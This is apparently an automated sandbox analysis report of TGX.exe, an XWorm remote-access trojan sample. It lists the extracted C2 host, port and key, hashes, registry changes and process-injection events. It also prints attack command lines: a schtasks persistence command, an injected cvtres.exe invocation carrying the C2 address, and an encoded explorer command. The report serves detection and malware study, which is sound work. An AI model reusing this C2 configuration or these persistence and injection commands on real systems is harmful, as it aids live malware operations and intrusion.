Analysis
  max time kernel: 146s
  max time network: 141s
  platform: windows10-2004_x64
  resource: win10v2004-20230221-en
  resource tags: arch:x64 arch:x86 image:win10v2004-20230221-en locale:en-us os:windows10-2004-x64 system
  submitted: 29-03-2023 04:39

Behavioral task behavioral1
  Sample: TGX.exe
  Resource: win7-20230220-en

Behavioral task behavioral2
  Sample: TGX.exe
  Resource: win10v2004-20230221-en
General
  Target: TGX.exe
  Size: 38KB
  MD5: ee272fb8a6844eb8b30f35614f0baa1f
  SHA1: 48be70669ce639e648fca442892f458c8729aca0
  SHA256: 9b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236
  SHA512: 341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785
  SSDEEP: 768:DzpMBIG6sJLIuv+044PF5Ph9tbkOwhnICFYCgc/:P6PDLfdFD9t4OwW8zJ

Malware Config
Extracted
  xworm
  browser-bangladesh.at.ply.gg:14018
  Dmpd64MhhEQE1POv
  install_file: USB.exe
Signatures

Checks computer location settings  (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation | TGX.exe

Drops startup file  (2 IoCs)
  Processes:
    description | ioc | process
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGX.lnk | TGX.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGX.lnk | TGX.exe

Executes dropped EXE  (3 IoCs)
  Processes:
    pid | process
    2816 | TGX.exe
    3652 | TGX.exe
    3936 | TGX.exe

Adds Run key to start application  (2 TTPs, 1 IoC)
  Processes:
    description | ioc | process
    Set value (str) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TGX = "C:\\Users\\Admin\\AppData\\Roaming\\TGX.exe" | TGX.exe

Looks up external IP address via web service  (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow | ioc
    18 | ip-api.com

Suspicious use of SetThreadContext  (1 IoC)
  Processes:
    description | pid | process | target process
    PID 4640 set thread context of 4636 | 4640 | TGX.exe | cvtres.exe

Enumerates physical storage devices  (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s)  (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

Modifies Internet Explorer settings
  Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Modifies registry class  (20 IoCs)
  Processes:
    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | explorer.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | explorer.exe
    Key created | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | explorer.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | explorer.exe
    Key created | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | explorer.exe
    Key created | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | explorer.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | explorer.exe
    Key created | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | explorer.exe
    Key created | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | explorer.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | explorer.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | explorer.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | explorer.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | explorer.exe
    Key created | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | explorer.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | explorer.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | explorer.exe
    Key created | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings | explorer.exe
    Set value (data) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | explorer.exe
    Set value (int) | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | explorer.exe
    Key created | \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | explorer.exe

Suspicious behavior: AddClipboardFormatListener  (1 IoC)
  Processes:
    pid | process
    4364 | explorer.exe

Suspicious behavior: EnumeratesProcesses  (3 IoCs)
  Processes:
    pid | process
    4640 | TGX.exe
    3596 | powershell.exe
    3596 | powershell.exe

Suspicious use of AdjustPrivilegeToken  (6 IoCs)
  Processes:
    description | pid | process
    Token: SeDebugPrivilege | 4640 | TGX.exe
    Token: SeDebugPrivilege | 4640 | TGX.exe
    Token: SeDebugPrivilege | 2816 | TGX.exe
    Token: SeDebugPrivilege | 3596 | powershell.exe
    Token: SeDebugPrivilege | 3652 | TGX.exe
    Token: SeDebugPrivilege | 3936 | TGX.exe

Suspicious use of SetWindowsHookEx  (3 IoCs)
  Processes:
    pid | process
    4640 | TGX.exe
    4364 | explorer.exe
    4364 | explorer.exe

Suspicious use of WriteProcessMemory  (16 IoCs)
  Processes:
    description | pid | process | target process
    PID 4640 wrote to memory of 1296 | 4640 | TGX.exe | schtasks.exe
    PID 4640 wrote to memory of 1296 | 4640 | TGX.exe | schtasks.exe
    PID 4640 wrote to memory of 4636 | 4640 | TGX.exe | cvtres.exe
    PID 4640 wrote to memory of 4636 | 4640 | TGX.exe | cvtres.exe
    PID 4640 wrote to memory of 4636 | 4640 | TGX.exe | cvtres.exe
    PID 4640 wrote to memory of 4636 | 4640 | TGX.exe | cvtres.exe
    PID 4640 wrote to memory of 4636 | 4640 | TGX.exe | cvtres.exe
    PID 4640 wrote to memory of 4636 | 4640 | TGX.exe | cvtres.exe
    PID 4640 wrote to memory of 4636 | 4640 | TGX.exe | cvtres.exe
    PID 4640 wrote to memory of 4636 | 4640 | TGX.exe | cvtres.exe
    PID 4636 wrote to memory of 3596 | 4636 | cvtres.exe | powershell.exe
    PID 4636 wrote to memory of 3596 | 4636 | cvtres.exe | powershell.exe
    PID 4636 wrote to memory of 3596 | 4636 | cvtres.exe | powershell.exe
    PID 3596 wrote to memory of 4384 | 3596 | powershell.exe | explorer.exe
    PID 3596 wrote to memory of 4384 | 3596 | powershell.exe | explorer.exe
    PID 3596 wrote to memory of 4384 | 3596 | powershell.exe | explorer.exe

Uses Task Scheduler COM API  (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Users\Admin\AppData\Local\Temp\TGX.exe  (PID 4640)
  "C:\Users\Admin\AppData\Local\Temp\TGX.exe"
  - Checks computer location settings
  - Drops startup file
  - Adds Run key to start application
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

    C:\Windows\System32\schtasks.exe  (PID 1296)
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "TGX" /tr "C:\Users\Admin\AppData\Roaming\TGX.exe"
      - Creates scheduled task(s)

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe  (PID 4636)
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" browser-bangladesh.at.ply.gg 14018 <123456789> AA7744BB240B53EC55E3
      - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 3596)
          powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\explorer.exe  (PID 4384)
              "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text

C:\Users\Admin\AppData\Roaming\TGX.exe  (PID 2816)
  C:\Users\Admin\AppData\Roaming\TGX.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\explorer.exe  (PID 4364)
  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx

C:\Windows\System32\rundll32.exe  (PID 4312)
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding

C:\Users\Admin\AppData\Roaming\TGX.exe  (PID 3652)
  C:\Users\Admin\AppData\Roaming\TGX.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken

C:\Users\Admin\AppData\Roaming\TGX.exe  (PID 3936)
  C:\Users\Admin\AppData\Roaming\TGX.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TGX.exe.log
  Filesize: 654B
  MD5: 2ff39f6c7249774be85fd60a8f9a245e
  SHA1: 684ff36b31aedc1e587c8496c02722c6698c1c4e
  SHA256: e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
  SHA512: 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qoitsbt4.kfj.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\TGX.exe
  Filesize: 38KB
  MD5: ee272fb8a6844eb8b30f35614f0baa1f
  SHA1: 48be70669ce639e648fca442892f458c8729aca0
  SHA256: 9b752a8369dc49b5fb2164b2b2e9f2ab7c7e8a3f0d99ed38edd7745cc4004236
  SHA512: 341287070bd21cb60e012473837c54d8cb7f8b322adec81f71215cd86a2116fadcafee44c518f0ba27863c7d0490dd77e23695f55612af0cc03c4a3646f1d785

memory/3596-153-0x0000000003130000-0x0000000003166000-memory.dmp  Filesize: 216KB
memory/3596-155-0x0000000005360000-0x0000000005370000-memory.dmp  Filesize: 64KB
memory/3596-168-0x00000000067B0000-0x00000000067CE000-memory.dmp  Filesize: 120KB
memory/3596-158-0x0000000006050000-0x00000000060B6000-memory.dmp  Filesize: 408KB
memory/3596-157-0x0000000005970000-0x0000000005992000-memory.dmp  Filesize: 136KB
memory/3596-156-0x00000000059A0000-0x0000000005FC8000-memory.dmp  Filesize: 6.2MB
memory/3596-154-0x0000000005360000-0x0000000005370000-memory.dmp  Filesize: 64KB
memory/4636-173-0x0000000005800000-0x0000000005810000-memory.dmp  Filesize: 64KB
memory/4636-152-0x0000000005CF0000-0x0000000005D56000-memory.dmp  Filesize: 408KB
memory/4636-151-0x0000000005800000-0x0000000005810000-memory.dmp  Filesize: 64KB
memory/4636-148-0x00000000059B0000-0x0000000005A42000-memory.dmp  Filesize: 584KB
memory/4636-150-0x00000000060A0000-0x0000000006644000-memory.dmp  Filesize: 5.6MB
memory/4636-149-0x0000000005A50000-0x0000000005AEC000-memory.dmp  Filesize: 624KB
memory/4636-147-0x0000000000400000-0x0000000000410000-memory.dmp  Filesize: 64KB
memory/4640-133-0x0000000000410000-0x0000000000420000-memory.dmp  Filesize: 64KB
memory/4640-143-0x000000001B960000-0x000000001B970000-memory.dmp  Filesize: 64KB
memory/4640-134-0x000000001B960000-0x000000001B970000-memory.dmp  Filesize: 64KB